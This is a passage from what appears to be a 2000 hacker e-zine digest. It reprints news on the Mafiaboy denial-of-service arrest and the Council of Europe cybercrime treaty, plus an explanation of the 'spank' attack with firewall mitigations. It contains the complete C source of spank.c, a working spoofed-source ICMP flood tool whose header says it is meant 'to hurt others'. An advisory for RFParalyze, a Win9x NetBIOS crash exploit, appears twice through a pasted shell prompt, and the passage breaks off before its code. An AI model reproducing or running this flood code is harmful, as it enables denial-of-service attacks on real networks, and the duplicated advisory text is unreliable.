research lab that was among those used to attack CNN.com. A
hacker electronically broke into the UCSB computer on Feb. 8 and
instructed it to send large amounts of traffic to CNN.com's Web site,
ABC quoted campus network program Kevin Schmidt as saying.
Jeffrey Johnson, chief executive of Meta Secure-com Solutions, an
Atlanta-based electronic commerce security firm, said that in such
Web attacks, hackers usually use several ''zombie'' computers to
which they had already illegally gained remote control to flood the
target site with incoming streams of nuisance data.
Johnson said Mafiaboy had been well known in the hacker
underground and in a popular Internet chat room for about two years.
Mafiaboy stood out from others because he often bragged in the
online chat room about how he planned to take down a few Web
sites.
``He was looking for bragging rights. He was doing it to show that he
has power,'' Johnson said.
Click here for current stock quotes: TWX YHOO AMZN
EBAY BUYX ATHM EGRP
RTR/NEWS-TECH-ARREST/
Copyright © 2000 Reuters Limited. All rights reserved. Republication
or redistribution of Reuters content, including by framing or similiar
means, is expressly prohibited without the prior written consent of
Reuters. Reuters shall not be liable for any errors or delays in
the content, or for any actions taken in reliance thereon. All active
hyperlinks have been inserted by AOL.com.
@HWA
11.1 Mafiaboy:Canadian Arrest Made in February Web Attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://abcnews.go.com/wire/US/reuters20000419_1950.html
WIRE:04/19/2000 10:10:00 ET
Canadian Arrest Made in
February Web Attacks
MONTREAL (Reuters) - Canadian
police were set to reveal details on
Wednesday of an arrest made in
connection with February's cyber
attacks that jammed some of the
Internet's most popular Web sites, amid
reports the suspect is a 15-year-old
known online as Mafiaboy.
The Royal Canadian Mounted Police said on Tuesday
that charges had been brought against what they
described only as "a person" in the cyber attacks.
"The investigation has given authorities the opportunity to
bring light on Internet attacks that have strongly shaken
the heart of electronic commerce worldwide, causing
losses that were evaluated at many hundred millions of
U.S. dollars," the force said in a statement.
The "denial-of-service" attacks on Feb. 2 shut down such
popular Web sites as Yahoo! (YHOO.O), Amazon.com
(AMZN.O) and eBay (EBAY.O) for hours.
In the assault, attackers meticulously obtained remote
control of over computers around the world. They then
used the computers to bombard the targeted Web sites,
flooding them with so much data that legitimate users
were temporarily denied access or service.
The Mounties declined to comment further on the arrest,
but ABC News reported on Tuesday that a 15-year-old
boy who used the online moniker Mafiaboy was arrested
over the weekend in the Montreal area and charged on
Monday.
The news division of the U.S. television network said
records in the case had been sealed because of the
suspect's age. Under Canada's Young Offenders Act,
authorities are not allowed to reveal the identities of
individuals less than 17 years of age who are charged
with crimes and set to be tried in juvenile court.
The Canadian police promised to release more
information at a news conference in Montreal at 10:30
a.m. EDT (1430 GMT) on Wednesday.
The U.S. Justice Department and the FBI were expected
to make a statement afterward. No comment was
immediately available from the department.
The Mounties said their investigation included their
Computer Investigation and Support Unit in Montreal, a
division of the FBI, the U.S. Justice Department and U.S.
National Infrastructure Protection Center. Canadian
police joined the hunt for the hackers in mid-February as
investigators suspected that a Canadian server had been
used in the assault.
The February attacks alarmed Internet users across the
globe, cost Web sites millions of dollars in revenue and
shook the electronic commerce industry because of the
apparent ease with which major sites were made
inaccessible.
ABC said investigators were allegedly able to trace the
attacks to Mafiaboy by examining the log files of a
computer at a University of California, Santa Barbara,
research lab that was among those used to attack
CNN.com (TWX.N).
A hacker electronically broke into the UCSB computer
on Feb. 8 and instructed it to send large amounts of
traffic to CNN.com's Web site, ABC quoted campus
network programmer Kevin Schmidt as saying.
ABC News said the FBI obtained chat room logs
allegedly showing that Mafiaboy had asked others what
sites he should take down before they were attacked.
Internet security expert Michael Lyle told the network he
had communicated with Mafiaboy and the 15-year-old
said he had attacked not only CNN.com but also
E+TRADE and several smaller Web sites.
A subscriber called Mafiaboy previously held two
accounts with Delphi Supernet, a Montreal Internet
service provider that Toronto-based ISP Internet Direct
bought last year.
The accounts were closed in March 1998 because
Mafiaboy violated subscriber policies, but Internet Direct
would not say what the violations were.
@HWA
11.2 Mafiaboy:Reno Says 'Mafiaboy' Hacker Must Face Punishment
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://my.aol.com/news/story.tmpl?table=n&cat=01&id=0004190119676550
Reno Says 'Mafiaboy' Hacker Must Face Punishment
Reuters
Apr 19 2000 1:19PM ET
WASHINGTON (Reuters) - U.S. Attorney General Janet Reno said
on Wednesday a 15-year-old boy arrested in Canada for jamming
the CNN.com Web site and other sites in February must face
punishment.
Canadian police in Montreal announced charges against the
15-year-old hacker known online as ``Mafiaboy'' for jamming the
CNN.com Web site and up to 1,200 CNN-hosted sites for four
hours on Feb. 8.
``I think that it's important first of all that we look at what we've seen
and let young people know that they are not going to be able to get
away with something like this scot-free,'' Reno told reporters on
Capitol Hill. ``There has got to be a remedy, there has got to be a
penalty.''
Reno said the U.S. government continued to work with industry on
that incident and others, now that law enforcement has shown it can
crack cyber-attack cases.
``I believe this recent breakthrough demonstrates our capacity to
track down those who would abuse this remarkable new technology,
and track them down wherever they may be,'' she said.
@HWA
11.3 Mafiaboy:FBI Has Evidence That He and Others Launched Web Attacks,
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://more.abcnews.go.com/sections/tech/dailynews/webattacks000216.html
Mafiaboy Suspected FBI Has Evidence That He and Others Launched
Web Attacks, Expert Says
A customer peruses computer wares for sale at a hacker convention. The FBI
is questioning hackers, computer security experts and others who might
have information on last week's Web attacks. (Lori Cain/AP Photo)
By Jonathan Dube
Feb. 16 A hacker who calls himself mafiaboy is believed to be
responsible for at least two of the attacks on leading Web sites, a
security expert tells ABCNEWS.com. FBI seeks hackers in Web attacks.
Chat room logs now in the possession of the FBI show that mafiaboy
asked others what sites he should take down before the sites were
attacked, Internet security expert Michael Lyle said. In a
later conversation with Lyle, mafiaboy claimed credit for attacking
CNN.com, E*TRADE and several smaller sites, and he shared technical
information that only someone involved in the attacks would know,
Lyle said. The FBI now has reason to believe that the attacks last
week that took down seven leading Web sites and at least six smaller
Web sites were launched by several people, acting independently.
Mafiaboy, who has been described as a 15-year-old Canadian, is
believed to be a copycat who launched his attacks only after Yahoo!
was knocked offline on Feb. 7. Mafiaboys Claims Seem Credible Dozens
of hackers have claimed credit for the attacks in online chats, but
Lyle says mafiaboy is the only one so far who appears to be credible.
Mafiaboy was saying What should I hit next? What should I hit
next? and people on the channel were suggesting sites, and mafiaboy
was saying, OK, CNN, said Lyle, the chief technology officer for
Recourse Technologies Inc., an Internet security company in Palo
Alto, Calif. And shortly thereafter the people on the channel would
be talking about CNN going down. If you look at the time stamps on
the logs, they also coincide with CNN going down. Lyle said the log
files show similar discussions prior to the Feb. 9 attacks on E*TRADE
and several other smaller sites. Chat room log files can be faked,
but Lyle said hes spoken with a number of others who witnessed the
conversations live and verified their authenticity.
Mafiaboy Knows Details Moreover, Lyle said he spoke with mafiaboy
over the Internet last Thursday and again last Friday and those
conversations bolstered the evidence against the young hacker. Mafiaboy
also said he was breaking into computers that were using a program called
WUFTP, which is often used to exchange data on university computers, Lyle
said. Mafiaboy said these computers were using an old version of WUFTP
that had security flaws in it and thus he was able to install the attack
software on the computers, Lyle said. He is believed to have installed
attack software called Tribal Flood Network, or TFN, on dozens of
computers, making them into zombies that he could then instruct to
launch the attacks. Lyle said mafiaboy told him specific details about the
ports that he used to connect with the zombie computers and launch the
attacks information that only someone involved in the attack would know.
More Than One Attacker The reason investigators believe different
culprits were responsible for some of the attacks is that the software
tools used to launch the attacks on Yahoo! and eBay were different than
those used to attack CNN.com and E*TRADE, Lyle said. The attacks on
CNN.com and E*TRADE are believed to have been launched using TFN, a
software program thats widely available on the Internet. The attacks on
Yahoo! and eBay were launched using a more sophisticated set of tools, he
said. Toronto-based Internet service provider Internet Direct said the
Royal Canadian Mounted Police had warned it that a subscriber called
mafiaboy previously held two accounts with Delphi Supernet, a Montreal
ISP the company bought last year. The accounts were closed in March 1998
because mafiaboy violated subscriber policies, but Internet Direct would
not say what the violations entailed. Lyle says he has turned his
information over to the FBI and has been working with investigators. Based
on his conversations with mafiaboy, Lyle said the teen likely committed
the attacks to boost his notoriety within the hacker community. Theres
this real effort among the people on all these channels to try and stand
out and look like the best hacker, or one of the best, Lyle said. And I
think that thats what he was searching after. That really explains why he
would brag the way he did about it.
FBI Interviews Coolio ABCNEWS has also learned that the FBI has
interviewed a hacker called coolio in connection with last weeks Web
attacks, but he denied any involvement. FBI officials told ABCNEWS Brian
Ross they had tracked down the teenage hacker in Southern California
because they believed he might have useful information for their
investigation. Coolio is well known to authorities as a member of Global
Hell, a group of teenagers who have hacked into White House and
Department of Defense computer systems. The officials said members of
Global Hell are still under investigation in connection with last weeks
Web attacks. The FBI also wants to question a hacker known as nachoman.
Officials have been careful to say they are not suspects, but just want to
talk to them about important information relating to the attacks.
Fast-Developing Leads In Washington, FBI Director Louis Freeh said
today investigators are running down hundreds of leads related to the Web
attacks, but still face substantial hurdles. There are fast developing
leads as we speak, Freeh told a Senate subcommittee. Freeh said the
investigation has led the FBI to at least four other countries, including
Canada and Germany. He also said FBI field offices in five cities are
participating in the investigation: Los Angeles, San Francisco, Atlanta,
Boston and Seattle. The FBI began investigating after leading Web portal
Yahoo! was attacked and made inaccessible for several hours on Feb. 7.
Then, on Feb. 8, Buy.com, Amazon.com, eBay and CNN.com were assaulted. And
on Feb. 10, technology site ZDNet and online trading site E*TRADE suffered
attacks. As many as 13 Web sites may have been attacked. Known as
denial-of-service attacks, the assaults effectively overloaded Web sites
with mock traffic so that real users couldnt access the sites. The
culprits took over computers in various parts of the world and used them
to bombard the victims sites with data. Investigators have located more
than a half-dozen computers used in last weeks attacks. Computers at two
California universities, a Midwestern school, a Berlin university, a
non-university site in Southern California, a home business in Oregon, and
machines at least four companies were used as zombies.
@HWA
11.4 Mafiaboy:Hacker cripples Area 51 site for 36 hours
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
04/21/00- Updated 11:36 AM ET
Hacker cripples Area 51 site for 36 hours
RALEIGH, N.C. (AP) - A hacker disrupted service for 36 hours to the Web
site that displays detailed satellite images of Area 51, the top-secret
Air Force site in Nevada.
Raleigh-based Aerial Images Inc. said the hacker struck six hours after
five images of the desert proving ground were loaded Monday night onto the
site, www.terraserver.com.
The attack, combined with traffic 10 times what the site usually bears,
meant millions of people had difficulty accessing the site or could not
connect with it at all, company officials said. Service was disrupted
until Thursday.
''I won't tell you it's completely solved,'' said John Hoffman, Aerial
Images president. ''We've taken steps to mitigate its effect. It's almost
a fact of being online these days.''
Hoffman declined to provide details of the attack, citing an ongoing
investigation.
The Air Force only recently acknowledged that Groom Dry Lake Air Force
Base even exists. Among UFO aficionados, it has long been known simply as
Area 51, the base's designation on old Nevada test site maps. They believe
that unidentified flying objects from other worlds are hidden there.
@HWA
xx.x [ISN] Clearing up questions about denial of service attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[Forwarded by: Mark Arena <marena@iinet.net.au>]
Hi all,
I just thought I'd clear up all these rumors, questions etc regarding
the denial of service attacks which happened a while ago.
1) Did mafiaboy use trinoo or smurf?
He didnt use either. He used a program called mstream and yes its
private. It basically is similar to trinoo. It comprises of a client
and a server. With the server it listens on port 7983 and you specify
the hosts which will connect to the server on that port. For that
reason you must have been added to the server to packet from it. On
the server.c program is appears like this:
char *m[]={
"1.1.1.1", /* first master */
"2.2.2.2", /* second master */
"3.3.3.3", /* third master etc */
0 };
Now as for the client you can define a password, serverfile and max
number of users to use the client at one time. The client then
connects to the servers and gets the servers to send all crap data to
the host you specify and hence if you got enough servers will take
them down eg as mafiaboy did.
2) So did mafiaboy actully hack anything?
The answer is yes. All the machine he installed the server on he had
to have root. Therefore he must have hacked a lot of machines in
preparation for the attack on the sites.
3) Did mafiaboy take out all the sites?
No, mafiaboy only took out yahoo, etrade and some others which I cant
remember. Coolio took out the rest. No matter what you're told I
assure you Coolio took out the rest.
4) How come it took so long for mafiaboy to get arrested?
Simple he hanged low and the fbi etc had not enough evidence to make
an arrest that was until his outburst on self-evident's msg board. His
allowed the fbi etc to swoop swiftly and quickly.
Now its time for my opinion:
1) Do you think mafiaboy will get convicted?
Well it depends, if mafiaboy admits to dos'ing those sites then yes I
believe he will be convicted then again if he denies it I believe they
won't have enough evidence on him. The only reason they caught him is
that his nick etc was posted on www.self-evident.com He also said to a
person I know that he destroyed the hard drive in a fire which would
give the fbi no physical evidence at his end.
Mafiaboy's story:
Here is a quick rephraze of what mafiaboy has said in channels before
he got arrested. His nick has been edited out for various reasons.
<> god fucking damnit
<> i wish i can go back in time
<> and undo what i did
In closing I'll tell you how I know this. Firstly I have spoken to
people associated with mafiaboy. I also have the program which he used
to take out the sites and no I won't send you it. Any other questions
etc direct them to me and i'll try answering them.
-------------------------------------------------------
Mark Arena marena@iinet.net.au
-------------------------------------------------------
@HWA
13.0 [MM] Cybercrime Solution Has Bugs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.wired.com/news/politics/0,1283,36047,00.html
Cybercrime Solution Has Bugs
by Declan McCullagh
3:00 a.m. May. 3, 2000 PDT
WASHINGTON -- U.S. and European police agencies will receive new powers to
investigate and prosecute computer crimes, according to a preliminary
draft of a treaty being circulated among over 40 nations.
The Council of Europe's 65KB proposal is designed to aid police in
investigations of online miscreants in cases where attacks or intrusions
cross national borders.
But the details of the "Draft Convention on Cybercrime" worry U.S. civil
libertarians. They warn that the plan would violate longstanding privacy
rights and grant the government far too much power.
The proposal, which is expected to be finalized by December 2000 and
appears to be the first computer crime treaty, would:
Make it a crime to create, download, or post on a website any
computer program that is "designed or adapted" primarily to gain
access to a computer system without permission. Also banned is
software designed to interfere with the "functioning of a
computer system" by deleting or altering data.
Allow authorities to order someone to reveal his or her passphrase
for an encryption key. According to a recent survey, only Singapore
and Malaysia have enacted such a requirement into law, and experts
say that in the United States it could run afoul of
constitutional protections against self-incrimination.
Internationalize a U.S. law that makes it a crime to possess even
digital images that "appear" to represent children's genitals or
children engaged in sexual conduct. Linking to such a site also would
be a crime.
Require websites and Internet providers to collect information about
their users, a rule that would potentially limit anonymous remailers.
U.S. law enforcement officials helped to write the document, which was
released for public comment last Thursday, and the Justice Department is
expected to urge the Senate to approve it next year. Other non-European
countries actively involved in negotiations include Canada, Japan,
and South Africa.
During recent testimony before Congress, Attorney General Janet Reno
warned of international computer crime, a claim that gained more
credibility last month with the arrest of alleged denial-of-service
culprit Mafiaboy in Canada.
"The damage that can be done by somebody sitting halfway around the world
is immense. We have got to be able to trace them, and we have made real
progress with our discussions with our colleagues in the G-8 and in the
Council of Europe," Reno told a Senate appropriations subcommittee
in February, the week after the denial-of-service attacks took place.
"Some countries have weak laws, or no laws, against computer crimes,
creating a major obstacle to solving and to prosecuting computer crimes. I
am quite concerned that one or more nations will become 'safe havens' for
cyber-criminals," Reno said.
Civil libertarians say the Justice Department will try to pressure the
Senate to approve the treaty even if it violates Americans' privacy
rights.
"The Council of Europe in this case has just been taken over by the U.S.
Justice Department and is only considering law enforcement demands," says
Dave Banisar, co-author of The Electronic Privacy Papers. "They're using
one more international organization to launder U.S. policy."
Banisar says Article 6 of the measure, titled "Illegal Devices," could ban
commonplace network security tools like crack and nmap, which is included
with Linux as a standard utility. "Companies would be able to criminalize
people who reveal security holes about their products," Banisar
said.
"I think it's dangerous for the Internet," says Barry Steinhardt,
associate director of the American Civil Liberties Union and a founder of
the Global Internet Liberty Campaign. "I think it will interfere with the
ability to speak anonymously."
"It will interfere with the ability of hackers -- using that term in a
favorable light -- to test their own security and the security of others,"
Steinhardt said.
Solveig Singleton, director of information studies at the libertarian Cato
Institute says it's likely -- although because of the vague language not
certain -- that anonymous remailers will be imperiled.
The draft document says countries must pass laws to "ensure the
expeditious preservation of that traffic data, regardless whether one or
more service providers were involved in the transmission of that
communication." A service provider is defined as any entity that
sends or receives electronic communications.
Representing the U.S. in the drafting process is the Justice Department's
Computer Crime and Intellectual Property section, which chairs the G-8
subgroup on high-tech crime and also is involved with a cybercrime project
at the Organization of American States. In December 1997 Reno
convened the first meeting on computer crime of the G-8 nations.
A recent White House working group, which includes representatives from
the Justice Department, FBI, and Secret Service has called for
restrictions on anonymity online, saying it can provide criminals with an
impenetrable shield. So has a report from a committee of the
European Parliament.
Other portions of the treaty include fairly detailed descriptions of
extradition procedures and requirements for countries to establish
around-the-clock computer-crime centers that police groups in other
countries may contact for immediate help.
The Council of Europe is not affiliated with the European Union, and
includes over 40 member nations, including Russia, which joined in 1996.
After the Council of Europe's expert group finalizes the proposed treaty,
the full committee of ministers must adopt the text. Then it will be sent
to countries for their signatures. Comments can be sent to daj@coe.int.
@HWA
14.0 [IND] The new spank.c DoS attack tool source and an analysis paper by 1st
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------------------------------
Explanation of the 'spank' attack
-- a new breed stream/raped
------------------------------------------------
By: lst (yardley@uiuc.edu)
This is a tad different than the previous release. Stream/Raped mearly
flooded the host with ack's (or no flags) and came from random ips with
random sequence numbers and/or ack numbers. The difference now is that
this not only does the previous stuff, but also directly attacks from and
to multicast addresses as well. Just as before, rate limiting should be
done to counteract its effect (the same idea as ICMP_BANDLIM). The
multicast handling should also be checked to verify that it is behaving
properly.
The attacker specifies the port[s] that they want to send the attack to,
depending on what ports are selected, you will have different net
results. If the port is an open port, then you will possibly have a longer
kernel path to follow before the drop. Therefore, a smart attacker will
hit open ports, but havoc can also come about from random ports due to
states and processing.
In the best case scenario, you will experience only the lag of the flood
and the lag of the processing (currently) and then be fine when the
attacker stops, In the worst case, you lockup, kill the network, and
possibly have to reboot. Once you patch it, you deal with a lot less
processing time (the drops are handled without the RST flag when
appropriate--bandlim type idea). In other words, you go to the drop
routine instead of dropwithrst silencing your response, which decreases
your processing time, the hit on your network, and the effect of the flood
(once a threshold is reached, all those bad packets are silently dropped
and the attack has less of a net effect).
The filters that were presented at the beginning of this email will block
all multicast packets that come out (and in) the tcp stack I have been
getting mailed a lot about this. Here is why I said the previous
statement. Receiving a packet with no flags is considered an illegal
packet (obviously) and is often dumped, however, as we have seen in
the past, illegal packets often wreak havoc and often go untested.
There is very little that "raped.c" or "stream.c" actually showed as
problems in the TCP/IP stacks. The true problem lies more in the effects
of the response (caused by the attack). This is the same concept as the
SYN floods of yesteryear, and the same type of thing will be done to handle
it. The main difference is that it will be on a simpler note because there
isn't much need for a "cookie" based system. One should just throttle the
response of the reset packets which in turn will help stop the storm that
you generate and in general, harden the tcp/ip stack to behave the way it
is supposed to.
The main effect of this attack is that you are shooting back RST+ACK's at
all the spoofed hosts. Obviously, a lot of these hosts will not exist and
you will get ICMP unreaches (as an example) bounced back at you. There are
other possibilities as well, but unreach would be the most common
(redirects might be common as well although i did not spend the time to
analyze that). The ones that don't respond back may send you some packets
back as well (depending on if the port was valid or not and what their
firewall rules are). This type of attack is complicated by the multicasts,
and the effect is amplified as well. All in all, it becomes very nasty
very quick. Basically, this causes a nice little storm of packets, in the
ideal case.
Note that I said ideal case in the previous paragraph. This is not always
the observed behavior. It all depends on what is on the subnet, what type
of packets are recieved, what rules and filters you have setup, and even
the duration of the flood. It has been pointed out several times that the
machine will go back to normal once the attack is stopped, which is exactly
why something like ICMP_BANDLIM will work.
I have also been asked a lot about what this "bug" affects. I have seen it
have effects on *BSD, Linux, Solaris, and Win* as far as OS's go. It has
also seemed to affect some hubs, switches, routers, or gateways since
entire subnets have "disappeared" briefly after the attack. The multicast
attack seems to be more deadly to teh network than the previous attack and
its affects get amplified and even carried over to the rest of the network
(bypassing secluded network bounds). I don't have more specifics on the
systems affected because of the difficulty in testing it (and keeping the
network up) since I do not have local access to the networks that I tested
on, and remote access gets real ugly real fast.
Another possibility that has been suggested as to why some machines die is
that the machine's route table is being blown up by the spoofed
packets. Each spoofed packet has a different source address which means
that a temporary route table entry is being created for each one. These
entries take time to timeout. Use 'vmstat -m' and check the 'routetbl'
field while the attack is going on.
Route table entries can be controlled somewhat under freebsd with:
[root@solid]::[~] sysctl -a | fgrep .rt
net.inet.ip.rtexpire: 3600
net.inet.ip.rtminexpire: 10
net.inet.ip.rtmaxcache: 128
You can do the following, to help if the route table is at least part of
the problem:
sysctl -w net.inet.ip.rtexpire=2
sysctl -w net.inet.ip.rtminexpire=2
Things that will help:
1. Drop all multicast packets (ingress and egress) that are addressed to
the tcp stack because multicasts are not valid for tcp.
2. Extend bandwidth limiting to include RST's, ACK's and anything else
that you feel could affect the stability of the machine.
3. Don't look for listening sockets if the packet is not a syn
I hope that this helps, or explains a little more at least.
---------------------------------------------------
Temporary remedy
---------------------------------------------------
If you use ipfilter, this MAY help you, but the issue is quite a bit
different than the previous issue.
-- start rule set --
block in quick proto tcp from any to any head 100
block in quick proto tcp from 224.0.0.0/28 to any group 100
pass in quick proto tcp from any to any flags S keep state group 100
pass out proto tcp from any to any flags S keep state
pass in all
-- end rule set --
optionally, a rule like the following could be inserted to handle outgoing
packets (if they send from the firewall somehow) but you have bigger
problems than the attack if that is the case.
-- start additional rule --
block out proto tcp from any to 224.0.0.0/28
-- end additional rule --
That will help you "stop" the attack (actually it will just help minimize
the affects), although it will still use some CPU though
Note: If you use IPFW, there is no immediate way to solve this problem due
to the fact that it is a stateless firewall. If you are getting attacked,
then temporarily use ipfilter (or any other state based firewall) to stop
it. Otherwise, wait for vendor patches or read more about the explanation
for other possible workarounds.
FreeBSD "unofficial patch" by Don Lewis:
http://solid.ncsa.uiuc.edu/~liquid/patch/don_lewis_tcp.diff
-----------------------
Conclusion
-----------------------
This bug was found in testing. It seems a bit more lethal than the
previous and should be addressed as such. Patches should be available now,
but I do not follow all the platforms.
--------------------
References
--------------------
This was done independantly, although some of the analysis and reverse
engineering of concept was done by other people. As a result, I would like
to give credit where credit is due. The following people contributed in
some way or another:
Brett Glass <brett@lariat.org>
Alfred Perlstein <bright@wintelcom.net>
Warner Losh <imp@village.org>
Darren Reed <avalon@coombs.anu.edu.au>
Don Lewis <Don.Lewis@tsc.tdk.com>
Also, I would like to send shouts out to w00w00 (http://www.w00w00.org)
-------------------
Attached
-------------------
These programs are for the sake of full disclosure, don't abuse
them. Spank was written with libnet, so you will need to obtain that as
well. You can find that at http://www.packetfactory.net/libnet
For an "unofficial" patch:
http://www.w00w00.org/files/spank/don_lewis_tcp.diff
For spank.c:
http://www.w00w00.org/files/spank/spank.c
-=-
/*
* spank.c by fred_ | blasphemy
*
* @@@@@@ @@@@@@@ @@@@@@ @@@ @@@ @@@ @@@
* @@@@@@@ @@@@@@@@ @@@@@@@@ @@@@ @@@ @@@ @@@
* !@@ @@! @@@ @@! @@@ @@!@!@@@ @@! !@@
* !@! !@! @!@ !@! @!@ !@!!@!@! !@! @!!
* !!@@!! @!@@!@! @!@!@!@! @!@ !!@! @!@@!@!
* !!@!!! !!@!!! !!!@!!!! !@! !!! !!@!!!
* !:! !!: !!: !!! !!: !!! !!: :!!
* !:! :!: :!: !:! :!: !:! :!: !:!
* :::: :: :: :: ::: :: :: :: :::
* :: : : : : : : :: : : :::
*
* This program is not for educational use
* in any shape or form. You must agree that
* you will only use it to hurt others.
*
* Warning, this program uses alot of bandwidth.
*
* usage: ./spank <source> <destination> <size>
*
*/
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <sys/types.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/ip_icmp.h>
static int in_cksum(u_short *addr, int len);
static void fill(int datalen, char *icmp_data);
#define PHDR_LEN sizeof(struct icmphdr) + sizeof(struct iphdr)
static void
fill(int datalen, char *icmp_data)
{
static u_int32_t rnd;
int i;
for (i = PHDR_LEN; i < datalen; i++) {
rnd = (3141592621U * rnd + 663896637U);
icmp_data[i] = rnd>>24;
}
}
int
main(int argc, char *argv[])
{
int count = 0, sock, x;
struct sockaddr_in sin;
fprintf(stdout, "spank.c coded by fred_ | blasphemy\n");
if (argc != 4) {
fprintf(stderr,
"ex., %s <source> <destination> <size>\n",
argv[0]);
exit(1);
}
if (atoi(argv[3]) < 1) {
fprintf(stderr,
"error: packet size is too small.\n");
exit(1);
}
sin.sin_family = AF_INET;
sin.sin_port = htons(0);
sin.sin_addr.s_addr = get_addr(argv[2]);
sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
if (sock < 0) {
perror("socket()");
exit(1);
}
setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &x, sizeof(x));
printf("each '.' is 25 packets\n");
while (1) {
send_packet(argv[1],
atoi(argv[3]), sin, sock);
count++;
if (count == 25) {
printf(".");
fflush(stdout);
count = 0;
}
usleep(10);
}
}
int get_addr(char *host)
{
static struct in_addr h;
struct hostent *hp;
h.s_addr = inet_addr(host);
if (h.s_addr == -1) {
hp = gethostbyname(host);
if (hp == NULL) {
fprintf(stderr,
"unable to resolve %s.\n", host);
exit(1);
}
bcopy(hp->h_addr, (char *)&h.s_addr, hp->h_length);
}
return h.s_addr;
}
int send_packet(char *src, int size,
struct sockaddr_in sin, int sock)
{
char *packet;
struct icmphdr *icmp;
struct iphdr *ip;
packet = (char *) malloc(PHDR_LEN + size);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
memset(packet, 0, PHDR_LEN);
fill(size, packet);
ip->tot_len = htons(PHDR_LEN + size);
ip->ihl = 5;
ip->ttl = 255;
ip->protocol = IPPROTO_ICMP;
ip->version = 4;
ip->tos = 0;
ip->frag_off = 0;
ip->saddr = get_addr(src);
ip->daddr = sin.sin_addr.s_addr;
ip->check = in_cksum((u_short *)ip,
sizeof(struct iphdr));
icmp->type = 8;
icmp->code = 1;
icmp->checksum = in_cksum((u_short *)icmp,
sizeof(struct icmphdr));
if (sendto(sock, packet, PHDR_LEN + size,
0, (struct sockaddr *)&sin,
sizeof(struct sockaddr)) == -1) {
close(sock);
perror("sendto()");
exit(1);
}
free(packet);
}
static int
in_cksum(u_short *addr, int len)
{
register int nleft = len;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *addr++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *) (&answer) = *(u_char *) addr;
sum += answer;
}
sum = (sum >> 16) + (sum + 0xffff);
sum += (sum >> 16);
answer = ~sum;
return (answer);
}
@HWA
15.0 [IND] RFParalyse.c:Cause undesired effects remotely against Win9x;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Source: http://www.wiretrip.net/rfp/
http://www.el8.org/adv/05012000_win98_winpopup.txt
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
/ /
/ e / - el8.org advisory
/ l /
/ 8 / - Evan Brewer <dm@el8.org>
/ . / - Rain Forest Puppy <rfp@wiretrip.net>
/ o /
/ r / - Synopsis: Cause undesired effects remotely against
/ g / win9[5,8] through an oddly formed winpopup message.
/ /
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
Details:
Through a netbios session request packet with a NULL source name,
Windows 9[5,8] show a number of odd responses. Everything from
lockups, reboots and "the blue screen of death", to total loss of
network connectivity.
Note that neither el8 or wiretrip discovered the vulnerability;
instead, a binary-only exploit found in the wild was reversed,
and the demonstration code attached was reconstructed. So it
should be noted:
THIS HAS BEEN FOUND IN THE WILD
The vulnerability specificly targets the Messenger service on
Windows 9[5,8]. At this point, it's doubtful there's anything
more worthy than a DoS capable. However, any information to the
contrary would be appreciated. :)
Source:
Attached is a quick hack called RFParalyze.c
Greets:
ADM / w00w00 / everyone at el8.org
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
/*********************************** www.el8.org **** www.wiretrip.net **/
/* - el8.org advisory: RFParalyze.c
code by rain forest puppy <rfp@wiretrip.net> -
coolness exhibited by Evan Brewer <dm@el8.org> -
:q
(n0where)[/home/sas] cat RFparalyse.txt
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
/ /
/ e / - el8.org advisory
/ l /
/ 8 / - Evan Brewer <dm@el8.org>
/ . / - Rain Forest Puppy <rfp@wiretrip.net>
/ o /
/ r / - Synopsis: Cause undesired effects remotely against
/ g / win9[5,8] through an oddly formed winpopup message.
/ /
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
Details:
Through a netbios session request packet with a NULL source name,
Windows 9[5,8] show a number of odd responses. Everything from
lockups, reboots and "the blue screen of death", to total loss of
network connectivity.
Note that neither el8 or wiretrip discovered the vulnerability;
instead, a binary-only exploit found in the wild was reversed,
and the demonstration code attached was reconstructed. So it
should be noted:
THIS HAS BEEN FOUND IN THE WILD
The vulnerability specificly targets the Messenger service on
Windows 9[5,8]. At this point, it's doubtful there's anything
more worthy than a DoS capable. However, any information to the
contrary would be appreciated. :)
Source:
Attached is a quick hack called RFParalyze.c
Greets:
ADM / w00w00 / everyone at el8.org
--/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\----/-\--
/*********************************** www.el8.org **** www.wiretrip.net **/
/* - el8.org advisory: RFParalyze.c
code by rain forest puppy <rfp@wiretrip.net> -
coolness exhibited by Evan Brewer <dm@el8.org> -
- Usage: RFParalyze <IP address> <NetBIOS name>
where <IP address> is the IP address (duh) of the target (note:
not DNS name). <NetBIOS name> is the NetBIOS name (again, duh) of
the server at the IP address given. A kiddie worth his scripts
should be able to figure out how to lookup the NetBIOS name.
Note: NetBIOS name must be in upper case.
This code was made from a reverse-engineer of 'whisper', a
binary-only exploit found in the wild.
